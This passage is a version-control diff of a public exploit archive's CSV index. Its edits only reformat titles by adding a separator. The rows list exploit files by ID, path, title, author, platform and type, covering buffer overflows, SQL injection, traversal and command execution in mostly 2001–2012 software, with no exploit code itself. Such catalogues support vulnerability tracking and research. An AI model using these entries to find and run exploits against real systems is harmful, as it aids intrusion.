Authentication Bypass",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",cgi,remote,0 -20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 +20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 Plugin - SQL Injection",2012-08-29,JoinSe7en,php,webapps,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow DoS",2001-06-12,"Jass Seljamaa",osx,dos,0 20923,platforms/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,unix,local,0 20924,platforms/linux/remote/20924.txt,"MDBms 0.96/0.99 Query Display Buffer Overflow",2001-06-12,teleh0r,linux,remote,0 -20925,platforms/java/webapps/20925.txt,"SiteWare 2.5/3.0/3.1 Editor Desktop Directory Traversal",2001-06-13,"Foundstone Labs",java,webapps,0 +20925,platforms/java/webapps/20925.txt,"SiteWare 2.5/3.0/3.1 Editor Desktop - Directory Traversal",2001-06-13,"Foundstone Labs",java,webapps,0 20926,platforms/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,linux,local,0 -20927,platforms/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",linux,local,0 +20927,platforms/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",linux,local,0 20928,platforms/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Buffer Overflow",2001-06-15,MasterSecuritY,linux,local,0 -20929,platforms/linux/remote/20929.c,"ghttpd 1.4 Daemon Buffer Overflow",2001-06-17,qitest1,linux,remote,0 +20929,platforms/linux/remote/20929.c,"ghttpd 1.4 - Daemon Buffer Overflow",2001-06-17,qitest1,linux,remote,0 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 20931,platforms/windows/remote/20931.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 20932,platforms/windows/remote/20932.sh,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 @@ -18236,7 +18232,7 @@ id,file,description,date,author,platform,type,port 20934,platforms/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Path Disclosure",2001-06-18,"SNS Research",windows,remote,0 20935,platforms/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution",2001-06-18,"Igor Dobrovitski",cgi,remote,0 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow",2001-06-15,"Sergio Monteiro",linux,remote,0 -20937,platforms/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 pmpost Symbolic Link",2001-06-18,IhaQueR,irix,local,0 +20937,platforms/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,irix,local,0 20938,platforms/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)",2001-06-18,"Peter Helms",cgi,remote,0 20939,platforms/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)",2001-06-18,"Peter Helms",cgi,remote,0 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - TTAWebTop.CGI Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0 @@ -18266,18 +18262,18 @@ id,file,description,date,author,platform,type,port 20966,platforms/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote,0 20967,platforms/linux/local/20967.c,"Vim 5.x - Swap File Race Condition",2001-01-26,zen-parse,linux,local,0 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Remote Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0 -20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap Buffer Overflow (1)",2001-06-26,noir,solaris,local,0 -20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow (2)",2001-06-27,Fyodor,solaris,local,0 +20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap - Buffer Overflow (1)",2001-06-26,noir,solaris,local,0 +20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap - Buffer Overflow (2)",2001-06-27,Fyodor,solaris,local,0 20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - .PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0 20973,platforms/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service",2001-06-26,gollum,multiple,dos,0 -20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow",2001-06-01,"Pablo Sor",solaris,local,0 +20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo - Buffer Overflow",2001-06-01,"Pablo Sor",solaris,local,0 20975,platforms/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (1)",2001-06-27,cronos,hardware,remote,0 20976,platforms/hardware/remote/20976.c,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote,0 20977,platforms/hardware/remote/20977.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (3)",2001-03-07,hypoclear,hardware,remote,0 20978,platforms/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (4)",2001-06-27,blackangels,hardware,remote,0 20979,platforms/linux/local/20979.c,"Linux Kernel 2.2 / 2.4 - procfs Stream Redirection to Process Memory Local Root",2001-06-27,zen-parse,linux,local,0 -20980,platforms/windows/remote/20980.c,"Oracle 8i TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote,0 +20980,platforms/windows/remote/20980.c,"Oracle 8i - TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote,0 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 - (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 @@ -18289,7 +18285,7 @@ id,file,description,date,author,platform,type,port 20989,platforms/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 - Device File Local DoS",2001-07-04,VIPER_SV,windows,dos,0 20990,platforms/linux/local/20990.c,"teTeX 1.0.7 Filters Temporary File Race Condition",2001-06-22,zen-parse,linux,local,0 20991,platforms/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 - Device File Remote DoS",2001-07-04,VIPER_SV,windows,dos,0 -20992,platforms/linux/local/20992.c,"Lmail 2.7 Temporary File Race Condition",2001-07-04,"Charles Stevenson",linux,local,0 +20992,platforms/linux/local/20992.c,"Lmail 2.7 - Temporary File Race Condition",2001-07-04,"Charles Stevenson",linux,local,0 20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM - Session Cookie Guessing",2001-06-24,"ntf & sky",unix,remote,0 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",linux,remote,0 20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 @@ -18311,7 +18307,7 @@ id,file,description,date,author,platform,type,port 21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 - TelnetD Weak Password Protection",2001-07-12,Siberian,hardware,remote,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0 -21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 +21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 - 4 SecureRemote Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local,0 @@ -18325,19 +18321,19 @@ id,file,description,date,author,platform,type,port 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 -21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 -21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 +21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 +21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,Metasploit,windows,remote,3200 -21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password",2001-07-26,John,windows,remote,0 +21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote,0 21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 - Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 -21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 +21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos,0 -21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 +21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 - Possible Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 - Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 -21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 -21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 +21044,platforms/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 +21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 - Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL DoS",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - DoS",1999-04-09,Epic,cgi,dos,0 @@ -18350,7 +18346,7 @@ id,file,description,date,author,platform,type,port 21056,platforms/php/webapps/21056.txt,"Group Office Calendar - (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 SPARC xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 -21059,platforms/solaris/local/21059.c,"Solaris 8 x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 +21059,platforms/solaris/local/21059.c,"Solaris 8 - x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,linux,local,0 21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0 21062,platforms/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",linux,local,0 @@ -18367,12 +18363,12 @@ id,file,description,date,author,platform,type,port 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x - LIST Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus ",linux,remote,0 -21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption",2001-08-20,MacSec,osx,local,0 +21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 - Weak Password Encryption",2001-08-20,MacSec,osx,local,0 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 -21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local,0 +21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local,0 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation",2012-09-05,Metasploit,php,webapps,0 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,Metasploit,multiple,remote,0 -21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 +21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 @@ -18380,13 +18376,13 @@ id,file,description,date,author,platform,type,port 21088,platforms/unix/remote/21088.pl,"AOLServer 3 - Long Authentication String Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 - Long Authentication String Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 -21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local,0 +21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 - FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local,0 21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service",2001-08-23,"Cisco Security",hardware,dos,0 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 - piomkapqd Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 -21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 -21096,platforms/windows/local/21096.txt,"Outlook Express 6 Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0 -21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 +21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 +21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0 +21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify Buffer Overflow",2001-09-03,foo,hp-ux,local,0 21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Services",2001-12-11,Camisade,windows,dos,0 21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 @@ -18394,13 +18390,13 @@ id,file,description,date,author,platform,type,port 21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 -21105,platforms/unix/local/21105.c,"Digital Unix 4.0 MSGCHK Buffer Overflow",2001-09-05,seo,unix,local,0 +21105,platforms/unix/local/21105.c,"Digital Unix 4.0 - MSGCHK Buffer Overflow",2001-09-05,seo,unix,local,0 21106,platforms/unix/local/21106.txt,"Taylor UUCP 1.0.6 - Argument Handling Privilege Elevation",2001-09-08,zen-parse,unix,local,0 -21107,platforms/unix/local/21107.sh,"Digital Unix 4.0 MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,unix,local,0 +21107,platforms/unix/local/21107.sh,"Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,unix,local,0 21108,platforms/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",unix,local,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution and Denial of Service",2001-09-12,byterage,windows,remote,0 21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0 -21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 +21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache - Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information and Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21114,platforms/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",freebsd,local,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 @@ -18421,8 +18417,8 @@ id,file,description,date,author,platform,type,port 21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows 2000/XP - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0 21132,platforms/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps,0 -21133,platforms/php/webapps/21133.txt,"Clipster Video Persistent XSS",2012-09-07,DaOne,php,webapps,0 -21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 +21133,platforms/php/webapps/21133.txt,"Clipster Video - Persistent XSS",2012-09-07,DaOne,php,webapps,0 +21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center - Auth Bypass",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - CSRF",2012-09-07,"High-Tech Bridge SA",php,webapps,0 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass",2012-08-30,Metasploit,linux,remote,0 21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,Metasploit,multiple,remote,0 @@ -18441,7 +18437,7 @@ id,file,description,date,author,platform,type,port 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (2)",2001-11-15,Indigo,windows,remote,0 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0 21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - Metacharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 -21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0 +21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0 21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 @@ -18455,7 +18451,7 @@ id,file,description,date,author,platform,type,port 21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",openbsd,dos,0 21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 - NewsDatabase/Template Modification",2001-12-01,"markus arndt",php,webapps,0 21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x - Outbound Packet Bypass",2001-12-06,"Tom Liston",windows,remote,0 -21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0 +21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0 21171,platforms/windows/dos/21171.c,"Microsoft Windows 2000 - Internet Key Exchange DoS (1)",2001-12-11,"Nelson Brito",windows,dos,0 21172,platforms/windows/dos/21172.pl,"Microsoft Windows 2000 - Internet Key Exchange DoS (2)",2001-12-07,"Nelson Brito",windows,dos,0 21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 Weak Username and Password Encryption",2001-12-07,shoeboy,windows,local,0 @@ -18486,7 +18482,7 @@ id,file,description,date,author,platform,type,port 21198,platforms/windows/remote/21198.html,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (1)",2002-01-03,"Tom Micklovitch",windows,remote,0 21199,platforms/windows/remote/21199.txt,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (2)",2002-01-03,"Liu Die",windows,remote,0 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution",2012-09-25,LiquidWorm,php,webapps,0 -21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote,0 +21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 - snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote,0 21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow",2002-01-04,Kanatoko,windows,remote,0 21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,linux,dos,0 21203,platforms/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",windows,remote,0 @@ -18497,11 +18493,11 @@ id,file,description,date,author,platform,type,port 21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21210,platforms/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Arbitrary Remote IRC Command Execution",2002-01-09,"Marcus Meissner",linux,remote,0 -21211,platforms/windows/remote/21211.txt,"EServ 2.9x Password-Protected File Access",2002-01-10,"Tamer Sahin",windows,remote,0 +21211,platforms/windows/remote/21211.txt,"EServ 2.9x - Password-Protected File Access",2002-01-10,"Tamer Sahin",windows,remote,0 21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0 -21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0 +21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0 21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0 -21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 jserver JS_MKDIR Metacharacter Command Execution",2002-01-11,UNYUN,unix,remote,0 +21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR Metacharacter Command Execution",2002-01-11,UNYUN,unix,remote,0 21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0 21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local,0 @@ -18510,7 +18506,7 @@ id,file,description,date,author,platform,type,port 21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component - (index.php module parameter) Blind SQLi",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File 